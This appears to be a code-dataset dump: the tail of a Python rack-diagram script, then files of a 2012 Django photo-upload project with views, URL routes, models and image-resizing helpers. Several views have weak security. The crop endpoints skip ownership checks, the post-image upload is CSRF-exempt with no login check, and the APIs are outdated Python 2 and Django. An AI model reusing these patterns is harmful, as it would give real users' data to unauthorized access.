#print (y, x, racks[y][x])\n str_for_racks += racks[y][x]\n str_for_racks+='|'\n str_for_racks=str_for_racks[:-1]\n str_for_racks+='}|'\n str_for_racks=str_for_racks[:-1]\n\n str_for_rack_position_diagram=\"\"\"\ndigraph structs {{\n node [shape=record]; \n room [ \n label=\"{0}\" \n ]; \n}}\n\"\"\".format(str_for_racks)\n # print (str_for_rack_position_diagram)\n\n with open(tmp_filename_rackpos_diag, 'w') as f:\n f.write(str_for_rack_position_diagram)\n os.system('dot -Tsvg -o {0}.svg {0}'.format(tmp_filename_rackpos_diag))\n\n\n ##\n # create rack-diagram\n ##\n str_each_rack=''\n for rack in js['racks']:\n # rackname, str_each_u\n str_each_u=create_str_each_u_from_each_u(rack)\n str_each_rack += \"\"\"\n rack {{\n 12U;\n description={0};\n {1}\n }}\n \"\"\".format(rack['rackname'], str_each_u)\n \n #print (str_each_rack)\n \n rackdiag=\"\"\"\n rackdiag {{\n ascending;\n {0}\n }}\n \"\"\".format(str_each_rack)\n \n #print (rackdiag)\n \n with open(tmp_filename, 'w') as f:\n f.write(rackdiag)\n os.system('rackdiag -Tsvg {0}'.format(tmp_filename))\n \n\nif __name__ == '__main__':\n main()\n" } ]
2
PeithVergil/django-uploadify
https://github.com/PeithVergil/django-uploadify
8da619429a4c6651eb09d47db5a410e1d50d0e62
1b26c0be4e293e9a4138beea14862dfc7853a570
7db861bff6668e5ac10841eec9e9e1a85ad3ace7
refs/heads/master
2016-09-05T19:46:41.398983
2012-08-05T16:16:53
2012-08-05T16:16:53
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6863207817077637, "alphanum_fraction": 0.6933962106704712, "avg_line_length": 28.275861740112305, "blob_id": "099d224d6b56810dcb3ff2f24f5ddbe71bdd3daa", "content_id": "266ee2b1d9ca9220cfd44a46e8b2191f61f2001e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 848, "license_type": "no_license", "max_line_length": 71, "num_lines": 29, "path": "/imahe/urls.py", "repo_name": "PeithVergil/django-uploadify", "src_encoding": "UTF-8", "text": "'''\nCreated on May 21, 2012\n\n@author: pvergil\n'''\n\nfrom django.conf.urls.defaults import patterns, url\nfrom django.contrib.auth.decorators import login_required\nfrom django.views.decorators.csrf import csrf_exempt\n\nfrom imahe.views import Gallery, ImageEditor, ImageViewer, Upload, Crop\n\ngallery = login_required(Gallery.as_view())\nupload = login_required(Upload.as_view())\ncrop = login_required(Crop.as_view())\n\nviewer = login_required(ImageViewer.as_view())\neditor = login_required(ImageEditor.as_view())\n\nupload = csrf_exempt(upload)\n\nurlpatterns = patterns('',\n url(r'^gallery/$', gallery, name='imahe_gallery'),\n url(r'^upload/$', upload, name='imahe_upload'),\n url(r'^crop/$', crop, name='imahe_crop'),\n \n url(r'^view/(?P<pk>\\d+)/$', viewer, name='imahe_viewer'),\n url(r'^edit/(?P<pk>\\d+)/$', editor, name='imahe_editor'),\n)" }, { "alpha_fraction": 0.5699208378791809, "alphanum_fraction": 0.5892699956893921, "avg_line_length": 28.947368621826172, "blob_id": "d32b4bffc20f46ac14f56ed28d945208e0f7b453", "content_id": "d35f9a680ac91aaaf2da255690f9f17c2f417237", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1137, "license_type": "no_license", "max_line_length": 73, "num_lines": 38, "path": "/images/views.py", "repo_name": "PeithVergil/django-uploadify", "src_encoding": "UTF-8", "text": "from django.http import HttpResponseForbidden\nfrom django.views.generic import ListView, View\nfrom django.shortcuts import get_object_or_404\n\nfrom images.models import Image\nfrom uploadify.lib import imaging, utils\n\nclass NewPhotos(ListView):\n template_name = 'images/new-photos.html'\n \n def get_queryset(self):\n images = Image.objects.filter(owner=self.request.user, stats='N')\n return images \n \nclass Crop(View):\n \n def post(self, request, *args, **kwargs):\n if not request.user.is_authenticated():\n return HttpResponseForbidden()\n \n id = request.POST.get('id')\n \n x1 = int(float(request.POST.get('x1')))\n y1 = int(float(request.POST.get('y1')))\n x2 = int(float(request.POST.get('x2')))\n y2 = int(float(request.POST.get('y2')))\n \n img = get_object_or_404(Image, id=id)\n \n imaging.crop(img.image.path, (x1, y1, x2, y2))\n imaging.crop(img.thumb.path, (x1, y1, x2, y2))\n \n img.stats = 'C'\n img.save()\n \n return utils.jsonResponse({\n 'status': 'OK'\n })" }, { "alpha_fraction": 0.6409090757369995, "alphanum_fraction": 0.6545454263687134, "avg_line_length": 19.045454025268555, "blob_id": "0cf24a895a2bd57de4d665d6534df6bf947a8dec", "content_id": "9a3026352f7afdd4ddf987cb50b3d3e93d7f58c5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 440, "license_type": "no_license", "max_line_length": 71, "num_lines": 22, "path": "/utils/mixins.py", "repo_name": "PeithVergil/django-uploadify", "src_encoding": "UTF-8", "text": "'''\nCreated on Aug 3, 2012\n\n@author: pvergil\n'''\n\nimport json\n\nfrom django.http import HttpResponse\n\nclass JSONResponseMixin(object):\n response = HttpResponse\n\n def render_to_response(self, context, **kwargs):\n kwargs['content_type'] = 'application/javascript; charset=utf8'\n\n return self.response(\n self.to_json(context), **kwargs\n )\n\n def to_json(self, context):\n return json.dumps(context)" }, { "alpha_fraction": 0.495626837015152, "alphanum_fraction": 0.5034013390541077, "avg_line_length": 21.369565963745117, "blob_id": "3b9e3acdce8f128ee284e857699450669eb287be", "content_id": "5cce74778bebb7a54bce56976353f3dab7ed689f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "HTML", "length_bytes": 1029, "license_type": "no_license", "max_line_length": 81, "num_lines": 46, "path": "/accounts/templates/accounts/register.html", "repo_name": "PeithVergil/django-uploadify", "src_encoding": "UTF-8", "text": "{% extends \"base.html\" %}\n\n{% block content %}\n<div class=\"row-fluid show-grid\">\n\t<div class=\"span12\">\n\t\t<form method=\"post\" action=\"{% url account_register %}\" class=\"well\">\n\t\t\t{% csrf_token %}\n\t\t\t<ul id=\"registration\" class=\"nostyle\">\n\t\t\t\t<li class=\"fn\">\n\t\t\t\t\t{{ form.fname.label_tag }}\n\t\t\t\t\t{{ form.fname }}\n\t\t\t\t\t{{ form.fname.errors }}\n\t\t\t\t</li>\n\t\t\t\t<li class=\"ln\">\n\t\t\t\t\t{{ form.lname.label_tag }}\n\t\t\t\t\t{{ form.lname }}\n\t\t\t\t\t{{ form.lname.errors }}\n\t\t\t\t</li>\n\t\t\t\t<li>\n\t\t\t\t\t{{ form.usrnm.label_tag }}\n\t\t\t\t\t{{ form.usrnm }}\n\t\t\t\t\t{{ form.usrnm.errors }}\n\t\t\t\t</li>\n\t\t\t\t<li>\n\t\t\t\t\t{{ form.email.label_tag }}\n\t\t\t\t\t{{ form.email }}\n\t\t\t\t\t{{ form.email.errors }}\n\t\t\t\t</li>\n\t\t\t\t<li>\n\t\t\t\t\t{{ form.pass1.label_tag }}\n\t\t\t\t\t{{ form.pass1 }}\n\t\t\t\t\t{{ form.pass1.errors }}\n\t\t\t\t</li>\n\t\t\t\t<li>\n\t\t\t\t\t{{ form.pass2.label_tag }}\n\t\t\t\t\t{{ form.pass2 }}\n\t\t\t\t\t{{ form.pass2.errors }}\n\t\t\t\t</li>\n\t\t\t\t<li>\n\t\t\t\t\t<input type=\"submit\" name=\"submit\" value=\"Submit\" class=\"btn btn-primary\" />\n\t\t\t\t</li>\n\t\t\t</ul>\n\t\t</form>\n\t</div>\n</div>\n{% endblock content %}\n" }, { "alpha_fraction": 0.7004454135894775, "alphanum_fraction": 0.7004454135894775, "avg_line_length": 34.959999084472656, "blob_id": "28083c6ff464a6ed70e08b90dcb18dd9ec2ab4bc", "content_id": "c5bc71eeb391437ab565e528552c5d1abc625b3a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 898, "license_type": "no_license", "max_line_length": 78, "num_lines": 25, "path": "/uploadify/urls.py", "repo_name": "PeithVergil/django-uploadify", "src_encoding": "UTF-8", "text": "from django.conf import settings\nfrom django.conf.urls import patterns, include, url\nfrom django.conf.urls.static import static\n\n# Uncomment the next two lines to enable the admin:\nfrom django.contrib import admin\nadmin.autodiscover()\n\nurlpatterns = patterns('',\n url(r'^adventure/', include('adventure.urls')),\n url(r'^accounts/', include('accounts.urls')),\n url(r'^uploader/', include('uploader.urls')),\n url(r'^images/', include('images.urls')),\n url(r'^imahe/', include('imahe.urls')),\n url(r'^post/', include('post.urls')),\n\n # Uncomment the admin/doc line below to enable admin documentation:\n # url(r'^admin/doc/', include('django.contrib.admindocs.urls')),\n\n # Uncomment the next line to enable the admin:\n url(r'^admin/', include(admin.site.urls)),\n)\n\n# Serve user-uploaded files\nurlpatterns += static(settings.MEDIA_URL, document_root = settings.MEDIA_ROOT)" }, { "alpha_fraction": 0.6724409461021423, "alphanum_fraction": 0.6818897724151611, "avg_line_length": 29.285715103149414, "blob_id": "20fbd011a6ba474638a7d61b8a0c317a9691d46b", "content_id": "30bad8ebc1dffe7cd205b9c146d881b3baee912a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 635, "license_type": "no_license", "max_line_length": 95, "num_lines": 21, "path": "/accounts/urls.py", "repo_name": "PeithVergil/django-uploadify", "src_encoding": "UTF-8", "text": "'''\nCreated on Apr 28, 2012\n\n@author: pvergil\n'''\n\nfrom django.conf.urls.defaults import patterns, url\n\nfrom accounts.views import AccountRegister\n\n#error_messages = {\n# 'invalid_login': 'Invalid username or password. Note that both fields are case-sensitive.'\n#}\n\nurlpatterns = patterns('',\n url(r'^login/$', 'django.contrib.auth.views.login',\n {'template_name': 'accounts/login.html'}, name='account_login'),\n url(r'^logout/$', 'django.contrib.auth.views.logout',\n {'template_name': 'accounts/logout.html'}, name='account_logout'),\n url(r'^register/$', AccountRegister.as_view(), name='account_register'),\n)" }, { "alpha_fraction": 0.6373626589775085, "alphanum_fraction": 0.6703296899795532, "avg_line_length": 15.636363983154297, "blob_id": "e44dd3bd9e47705e43de863b2cc7f616e07d3fb3", "content_id": "e57b51aef113cbada1be6530c9cf504956873b4c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 182, "license_type": "no_license", "max_line_length": 51, "num_lines": 11, "path": "/adventure/urls.py", "repo_name": "PeithVergil/django-uploadify", "src_encoding": "UTF-8", "text": "'''\nCreated on Jun 27, 2012\n\n@author: pvergil\n'''\n\nfrom django.conf.urls.defaults import patterns, url\n\nurlpatterns = patterns('',\n# url(r'^view/$', view, name='adventure_view')\n)" }, { "alpha_fraction": 0.7419354915618896, "alphanum_fraction": 0.7526881694793701, "avg_line_length": 25.714284896850586, "blob_id": "f630c53a1d67728d989c40e4719a5fee2882537d", "content_id": "6d7f71088a0e41aaa4a1a9af89a29937cc1ac3b1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 186, "license_type": "no_license", "max_line_length": 70, "num_lines": 7, "path": "/utils/__init__.py", "repo_name": "PeithVergil/django-uploadify", "src_encoding": "UTF-8", "text": "import random\nimport string\n\nASCII_CHARS = string.ascii_letters + string.digits \n\ndef get_random_string(length=30):\n return ''.join(random.choice(ASCII_CHARS) for x in xrange(length))" }, { "alpha_fraction": 0.7142857313156128, "alphanum_fraction": 0.7305194735527039, "avg_line_length": 17.176469802856445, "blob_id": "1110f7fc7dc5627f33e58c41ddc0b0c103ad4235", "content_id": "ab97458b52f00f5a27494d724960d7b606c3eb35", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 308, "license_type": "no_license", "max_line_length": 60, "num_lines": 17, "path": "/imahe/templatetags/uploadify_tags.py", "repo_name": "PeithVergil/django-uploadify", "src_encoding": "UTF-8", "text": "'''\nCreated on Aug 1, 2012\n\n@author: pvergil\n'''\n\nfrom django import template\n\nregister = template.Library()\n\[email protected]_tag('imahe/uploadify_dependencies.html')\ndef uploadify_dependencies():\n return {}\n\[email protected]_tag('imahe/uploadify_button.html')\ndef uploadify_button():\n return {}" }, { "alpha_fraction": 0.6226415038108826, "alphanum_fraction": 0.6226415038108826, "avg_line_length": 29.80645179748535, "blob_id": "ef056c1a242f0769db02f36cb6479f8f4cdd275a", "content_id": "98f7a2d867a50f0ef6aad9f231ec7b89f9767a01", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 954, "license_type": "no_license", "max_line_length": 61, "num_lines": 31, "path": "/uploader/views.py", "repo_name": "PeithVergil/django-uploadify", "src_encoding": "UTF-8", "text": "from django.conf import settings\nfrom django.http import HttpResponse, HttpResponseForbidden\nfrom django.views.generic import View, TemplateView\n\nfrom images.models import Image\n\nclass FileUpload(TemplateView):\n template_name = 'uploader/file-upload.html'\n \n def get(self, request, *args, **kwargs):\n context = self.get_context_data(**kwargs)\n \n context['session_nm'] = settings.SESSION_COOKIE_NAME\n context['session_ky'] = request.session.session_key\n \n return self.render_to_response(context)\n \nclass FileUploadHandler(View):\n \n def post(self, request, *args, **kwargs):\n user = request.user\n \n if user.is_authenticated():\n data = request.FILES['Filedata']\n \n image = Image(image=data, thumb=data, owner=user)\n image.save()\n \n return HttpResponse()\n else:\n return HttpResponseForbidden()" }, { "alpha_fraction": 0.6418337821960449, "alphanum_fraction": 0.6504297852516174, "avg_line_length": 23.964284896850586, "blob_id": "e1bc9a1a865a460bc254378cd27e6ed0db28cf9a", "content_id": "839682e029ba8f042580e6703c977da43564d7f9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 698, "license_type": "no_license", "max_line_length": 68, "num_lines": 28, "path": "/post/urls.py", "repo_name": "PeithVergil/django-uploadify", "src_encoding": "UTF-8", "text": "'''\nCreated on Jul 19, 2012\n\n@author: pvergil\n'''\n\nfrom django.conf.urls import patterns, url\nfrom django.contrib.auth.decorators import login_required\nfrom django.views.decorators.csrf import csrf_exempt\n\nfrom post.views import AddImage, AddPost, AllPost, AddView, ViewView\n\n_all = AllPost.as_view()\n_new = AddPost.as_view()\n_img = AddImage.as_view()\n\n_img = csrf_exempt(_img)\n\n_add = login_required(AddView.as_view())\n_view = ViewView.as_view()\n\nurlpatterns = patterns('',\n url(r'^$', _all, name='post_all'),\n url(r'^add/$', _add, name='post_add'),\n url(r'^new/$', _new, name='post_new'),\n url(r'^img/$', _img, name='post_img'),\n url(r'^(?P<pid>\\d+)/$', _view, name='post_view'),\n)" }, { "alpha_fraction": 0.5447698831558228, "alphanum_fraction": 0.5550906658172607, "avg_line_length": 31.600000381469727, "blob_id": "db0bbc33b54cfb6e96bf011c3462552481d5dcd7", "content_id": "f3e7541b3af7c249d82ccb3b5b71c73c10c8a7f7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3585, "license_type": "no_license", "max_line_length": 76, "num_lines": 110, "path": "/imahe/views.py", "repo_name": "PeithVergil/django-uploadify", "src_encoding": "UTF-8", "text": "from django.conf import settings\nfrom django.core.urlresolvers import reverse\nfrom django.views.generic import DetailView, ListView, TemplateView\nfrom django.http import HttpResponseForbidden\nfrom django.shortcuts import get_object_or_404, redirect\n\nfrom imahe.forms import PhotoEditorForm\nfrom imahe.models import Photo\nfrom uploadify.lib import imaging, utils\n\nclass Gallery(ListView):\n template_name = 'imahe/gallery.html'\n \n def get_queryset(self):\n return Photo.objects.filter(owner=self.request.user) \n\nclass Upload(TemplateView):\n template_name = 'imahe/upload.html'\n \n def get(self, request, *args, **kwargs):\n context = self.get_context_data(**kwargs)\n context['session_nm'] = settings.SESSION_COOKIE_NAME\n context['session_ky'] = request.session.session_key\n return self.render_to_response(context)\n \n def post(self, request, *args, **kwargs):\n user = request.user\n \n if user.is_authenticated():\n data = request.FILES['Filedata']\n \n photo = Photo.objects.create(image=data, thumb=data, owner=user)\n # Resize the photo so it has a width of 620 pixels\n imaging.resizeWidth(photo.image.path)\n # Resize the thumbnail to 180x180 pixels\n imaging.fit(photo.thumb.path)\n \n return utils.jsonResponse({\n 'redirect': reverse('imahe_editor', args=[photo.id]),\n 'message': 'Photo uploaded',\n 'status': 'OK'\n })\n else:\n return HttpResponseForbidden()\n \nclass Crop(TemplateView):\n template_name = 'imahe/crop.html'\n \n def post(self, request, *args, **kwargs):\n user = request.user\n \n if user.is_authenticated():\n id = request.POST.get('id')\n \n x1 = int(float(request.POST.get('x1')))\n y1 = int(float(request.POST.get('y1')))\n x2 = int(float(request.POST.get('x2')))\n y2 = int(float(request.POST.get('y2')))\n \n img = get_object_or_404(Photo, id=id)\n \n imaging.crop(img.image.path, (x1, y1, x2, y2))\n imaging.crop(img.thumb.path, (x1, y1, x2, y2))\n \n img.stats = 'C'\n img.save()\n \n return utils.jsonResponse({\n 'status': 'OK'\n })\n else:\n return HttpResponseForbidden()\n \nclass ImageViewer(DetailView):\n template_name = 'imahe/viewer.html'\n context_object_name = 'photo'\n model = Photo\n\nclass ImageEditor(TemplateView):\n template_name = 'imahe/editor.html'\n \n def get_context_data(self, **kwargs):\n photo = get_object_or_404(Photo, pk = kwargs.get('pk'))\n form = PhotoEditorForm(instance=photo)\n return {\n 'photo': photo,\n 'form': form\n }\n \n def post(self, request, *args, **kwargs):\n photo = get_object_or_404(Photo, pk=kwargs.get('pk'))\n form = PhotoEditorForm(request.POST, instance=photo)\n \n if form.is_valid():\n title = form.cleaned_data.get('title')\n descr = form.cleaned_data.get('description')\n \n photo.description = descr\n photo.title = title\n photo.save()\n \n return redirect(\n 'imahe_viewer',\n kwargs.get('pk')\n )\n \n return self.render_to_response({\n 'photo': photo,\n 'form': form\n })" }, { "alpha_fraction": 0.5701538324356079, "alphanum_fraction": 0.5735384821891785, "avg_line_length": 33.585105895996094, "blob_id": "3e1772bc00a57d36debc367501ca838743616be0", "content_id": "f335e5c5ca9d9f33db0cada42fb17c2aacbdeee7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3250, "license_type": "no_license", "max_line_length": 91, "num_lines": 94, "path": "/post/views.py", "repo_name": "PeithVergil/django-uploadify", "src_encoding": "UTF-8", "text": "from django.conf import settings\nfrom django.contrib.auth.models import User\nfrom django.views.generic import DetailView, TemplateView, View\n\nfrom post.forms import PostForm\nfrom post.models import Post, PostImage\nfrom utils.mixins import JSONResponseMixin\nfrom utils import imaging\n\nclass AddView(TemplateView):\n template_name = 'post/add.html'\n \n def get(self, request, *args, **kwargs):\n context = self.get_context_data(**kwargs)\n \n context['session_nm'] = settings.SESSION_COOKIE_NAME\n context['session_ky'] = request.session.session_key\n \n context['postform'] = PostForm()\n context['user'] = request.user\n \n return self.render_to_response(context)\n \nclass AllPost(TemplateView):\n template_name = 'post/all.html'\n \n def get(self, request, *args, **kwargs):\n context = {\n 'user': request.user,\n 'postform': PostForm()\n }\n \n if request.user.is_authenticated():\n return self._a(request, context, *args, **kwargs)\n else:\n return self._b(request, context, *args, **kwargs)\n \n def _a(self, request, context, *args, **kwargs):\n context['posts'] = Post.objects.filter(author = request.user).order_by('-postdate')\n return self.render_to_response(context)\n \n def _b(self, request, context, *args, **kwargs):\n context['posts'] = Post.objects.all().order_by('-postdate')\n return self.render_to_response(context)\n \nclass AddPost(JSONResponseMixin, View):\n def post(self, request, *args, **kwargs): \n content = request.POST.get('content')\n userid = request.POST.get('userid')\n \n context = { 'status': 0 }\n try:\n user = User.objects.get(id=userid)\n \n if user == request.user:\n post = Post.objects.create(author=user, content=content)\n \n context['message'] = 'New post added.'\n context['postid'] = post.id\n context['status'] = 1\n else:\n context['message'] = 'Invalid user ID.'\n except User.DoesNotExist:\n context['message'] = 'User does not exist.'\n \n return self.render_to_response(context)\n\nclass AddImage(JSONResponseMixin, View):\n def post(self, request, *args, **kwargs):\n postid = request.POST.get('postid')\n \n context = { 'status': 0 }\n try:\n data = request.FILES['Filedata']\n \n post = Post.objects.get(id=postid)\n \n image = PostImage.objects.create(post=post, image=data, thumb=data)\n \n # Resize the photo so it has a width of 620 pixels\n imaging.resizeWidth(image.image.path)\n # Resize the thumbnail to 80x80 pixels\n imaging.resizeThumb(image.thumb.path)\n \n context['message'] = 'New image added.'\n context['imageid'] = image.id\n context['status'] = 1\n except Post.DoesNotExist:\n context['message'] = 'Post does not exist.'\n \n return self.render_to_response(context)\n \nclass ViewView(DetailView):\n model = Post" }, { "alpha_fraction": 0.5769230723381042, "alphanum_fraction": 0.616550087928772, "avg_line_length": 20.475000381469727, "blob_id": "c2c111a9f05ae53d4761750ed76e69db49e6cd8a", "content_id": "7ac7f92040aeca197b2cccba31372351f5ed6ed0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 858, "license_type": "no_license", "max_line_length": 56, "num_lines": 40, "path": "/utils/imaging.py", "repo_name": "PeithVergil/django-uploadify", "src_encoding": "UTF-8", "text": "'''\nCreated on Aug 5, 2012\n\n@author: pvergil\n'''\n\nimport Image\nimport ImageOps\n\ndef fit(path, size=(180, 180)):\n img = Image.open(path)\n fit = ImageOps.fit(img, size, Image.ANTIALIAS)\n fit.save(path)\n\ndef crop(path, box=(0, 0, 450,450)):\n img = Image.open(path)\n crp = img.crop(box)\n crp.save(path)\n \ndef resize(path, size=(620,620)):\n img = Image.open(path)\n img.thumbnail(size, Image.ANTIALIAS)\n img.save(path)\n \ndef resizeWidth(path, width=620):\n img = Image.open(path)\n \n maxw = width\n \n # Calculate ratio\n rtio = float(maxw) / img.size[0]\n # Calculate max height\n maxh = int(rtio * img.size[1])\n \n img.resize((maxw, maxh), Image.ANTIALIAS).save(path)\n \ndef resizeThumb(path, size=(80, 80)):\n img = Image.open(path)\n fit = ImageOps.fit(img, size, Image.ANTIALIAS)\n fit.save(path)" }, { "alpha_fraction": 0.7030739188194275, "alphanum_fraction": 0.7122302055358887, "avg_line_length": 36.29268264770508, "blob_id": "6021196a93e4709f8cdefd71e673dbdac7193eb2", "content_id": "f5fdb0ca68149750ac33b31ec0757d2420fd7898", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1529, "license_type": "no_license", "max_line_length": 103, "num_lines": 41, "path": "/imahe/models.py", "repo_name": "PeithVergil/django-uploadify", "src_encoding": "UTF-8", "text": "import os\nimport datetime\n\nfrom django.contrib.auth.models import User\nfrom django.db import models\n\nfrom uploadify.lib.utils import get_random_string\n\ndef image_upload(instance, filename):\n return _upload(instance, filename, 'uploads/%d/images/%d/%d/%d/%s%s')\n\ndef thumb_upload(instance, filename):\n return _upload(instance, filename, 'uploads/%d/thumbs/%d/%d/%d/%s%s')\n\ndef _upload(instance, filename, path):\n today = datetime.datetime.now()\n file_nm, file_ex = os.path.splitext(filename)\n return path % (instance.owner.id, today.year, today.month, today.day, get_random_string(), file_ex)\n\nSTATUS_CHOICES = (\n ('N', 'New'),\n ('C', 'Cropped'),\n)\n\nclass Photo(models.Model):\n owner = models.ForeignKey(User)\n image = models.ImageField(upload_to=image_upload)\n thumb = models.ImageField(upload_to=thumb_upload)\n title = models.CharField(max_length=160, default='Untitled')\n description = models.CharField(max_length=255, blank=True, null=True)\n status = models.CharField(max_length=1, choices=STATUS_CHOICES, default='N')\n date = models.DateTimeField(auto_now_add=True)\n\nclass Imahe(models.Model):\n owner = models.ForeignKey(User)\n image = models.ImageField(upload_to=image_upload)\n thumb = models.ImageField(upload_to=thumb_upload)\n stats = models.CharField(max_length=1, choices=STATUS_CHOICES, default='N')\n date = models.DateTimeField(auto_now_add=True)\n title = models.CharField(max_length=255)\n desc = models.CharField(max_length=255, blank=True, null=True)\n" }, { "alpha_fraction": 0.6355828046798706, "alphanum_fraction": 0.6552147269248962, "avg_line_length": 31.639999389648438, "blob_id": "ecc6fd1be986c6550e5f2f8b5aef31b04b60b614", "content_id": "130246659582637879d3936a97cfa82f0b613bfc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 815, "license_type": "no_license", "max_line_length": 95, "num_lines": 25, "path": "/accounts/forms.py", "repo_name": "PeithVergil/django-uploadify", "src_encoding": "UTF-8", "text": "'''\nCreated on Apr 28, 2012\n\n@author: pvergil\n'''\n\nfrom django import forms\nfrom django.contrib.auth.models import User\n\nclass RegistrationForm(forms.Form):\n fname = forms.CharField(label = 'First Name')\n lname = forms.CharField(label = 'Last Name')\n usrnm = forms.CharField(label = 'Username')\n email = forms.EmailField(label = 'Email', required=False)\n pass1 = forms.CharField(widget = forms.PasswordInput, label = 'Password')\n pass2 = forms.CharField(widget = forms.PasswordInput, label = 'Password Confirmation')\n \n def clean_pass2(self):\n p1 = self.cleaned_data.get('pass1', '')\n p2 = self.cleaned_data.get('pass2', '')\n \n if p1 != p2:\n raise forms.ValidationError('The password and password confirmation did not match')\n \n return p2" }, { "alpha_fraction": 0.7056074738502502, "alphanum_fraction": 0.7172897458076477, "avg_line_length": 22.83333396911621, "blob_id": "67785610522685610071304c209fa626ee273310", "content_id": "f17baba9f00cf16a7823614925b663c84adebed2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 428, "license_type": "no_license", "max_line_length": 62, "num_lines": 18, "path": "/images/urls.py", "repo_name": "PeithVergil/django-uploadify", "src_encoding": "UTF-8", "text": "'''\nCreated on May 9, 2012\n\n@author: pvergil\n'''\n\nfrom django.conf.urls.defaults import patterns, url\nfrom django.contrib.auth.decorators import login_required\n\nfrom images.views import NewPhotos, Crop\n\nnewPhotos = login_required(NewPhotos.as_view())\ncrop = login_required(Crop.as_view())\n\nurlpatterns = patterns('',\n url(r'^new-photos/$', newPhotos, name='images_newphotos'),\n url(r'^crop/$', crop, name='images_crop'),\n)" }, { "alpha_fraction": 0.7495326995849609, "alphanum_fraction": 0.7607476711273193, "avg_line_length": 27.210525512695312, "blob_id": "ccf0525ea3a826d880ca4ed4b1e9ba70414b9121", "content_id": "dc2e004aad294f54b55a652baf9dc5d722e9c225", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 535, "license_type": "no_license", "max_line_length": 65, "num_lines": 19, "path": "/uploader/urls.py", "repo_name": "PeithVergil/django-uploadify", "src_encoding": "UTF-8", "text": "'''\nCreated on Apr 26, 2012\n\n@author: vergil\n'''\n\nfrom django.conf.urls.defaults import patterns, url\nfrom django.contrib.auth.decorators import login_required\nfrom django.views.decorators.csrf import csrf_exempt\n\nfrom uploader.views import FileUpload, FileUploadHandler\n\nfileUpload = login_required(FileUpload.as_view())\nfileHandler = csrf_exempt(FileUploadHandler.as_view())\n\nurlpatterns = patterns('',\n url(r'^upload/$', fileUpload, name='uploader_fileupload'),\n url(r'^handler/$', fileHandler, name='uploader_filehandler'),\n)" }, { "alpha_fraction": 0.6414309740066528, "alphanum_fraction": 0.6489184498786926, "avg_line_length": 22.58823585510254, "blob_id": "085a0400bf75cc0ddfe9871939b7d37a8db50ff2", "content_id": "cf9f98cee0f066bd6a5a9360da01a1f5af3f8c3a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1202, "license_type": "no_license", "max_line_length": 74, "num_lines": 51, "path": "/uploadify/lib/utils.py", "repo_name": "PeithVergil/django-uploadify", "src_encoding": "UTF-8", "text": "'''\nCreated on Apr 26, 2012\n\n@author: pvergil\n'''\n\nimport os\nimport errno\n\nimport random\nimport string\n\nfrom django.conf import settings\nfrom django.http import HttpResponse\nfrom django.utils import simplejson\n\nASCII_CHARS = string.ascii_letters + string.digits \n\ndef get_random_string(length=30):\n return ''.join(random.choice(ASCII_CHARS) for x in xrange(length))\n\ndef save_upload(data, filename=None):\n mdia_dir = settings.MEDIA_ROOT\n upld_dir = 'uploads'\n \n file_nm, file_ex = os.path.splitext(data.name)\n \n if not filename:\n file_nm = '%s%s' % (get_random_string(), file_ex)\n else:\n file_nm = '%s%s' % (filename, file_ex)\n \n dest_fle = os.path.normpath(os.path.join(mdia_dir, upld_dir, file_nm))\n \n destination = open(dest_fle, 'wb+')\n for chunk in data.chunks():\n destination.write(chunk)\n destination.close()\n \n return dest_fle\n\ndef make_directory(directory):\n try:\n os.makedirs(directory)\n except OSError, e:\n if e.errno != errno.EEXIST:\n raise e\n \ndef jsonResponse(data):\n return HttpResponse(simplejson.dumps(data),\n content_type = 'application/javascript; charset=utf8')" }, { "alpha_fraction": 0.7136563658714294, "alphanum_fraction": 0.7147576808929443, "avg_line_length": 30.310344696044922, "blob_id": "a63f9cbb2db854fecf60d4ed582e629276c7b063", "content_id": "1d4438486c13ca393077e98617356b979eabffec", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 908, "license_type": "no_license", "max_line_length": 79, "num_lines": 29, "path": "/images/models.py", "repo_name": "PeithVergil/django-uploadify", "src_encoding": "UTF-8", "text": "import os\n\nfrom django.contrib.auth.models import User\nfrom django.db import models\nfrom django.utils.dateformat import format\n\nfrom uploadify.lib.utils import get_random_string\n\ndef image_upload(instance, filename):\n return _upload(instance, filename, 'uploads/%d/image/%s%s')\n\ndef thumb_upload(instance, filename):\n return _upload(instance, filename, 'uploads/%d/thumb/%s%s')\n\ndef _upload(instance, filename, path):\n file_nm, file_ex = os.path.splitext(filename)\n return path % (instance.owner.id, get_random_string(), file_ex)\n\nSTATUS_CHOICES = (\n ('N', 'New'),\n ('C', 'Cropped'),\n)\n\nclass Image(models.Model):\n owner = models.ForeignKey(User)\n image = models.ImageField(upload_to=image_upload)\n thumb = models.ImageField(upload_to=thumb_upload)\n stats = models.CharField(max_length=1, choices=STATUS_CHOICES, default='N')\n date = models.DateTimeField(auto_now_add=True)\n" }, { "alpha_fraction": 0.6963788270950317, "alphanum_fraction": 0.7130919098854065, "avg_line_length": 26.69230842590332, "blob_id": "6a6a6fb097cce197287955102fcfb33f2ee8b74f", "content_id": "a8154ebf930051b6c6447e9b2ea7d190f44c6c41", "detected_licenses": [], 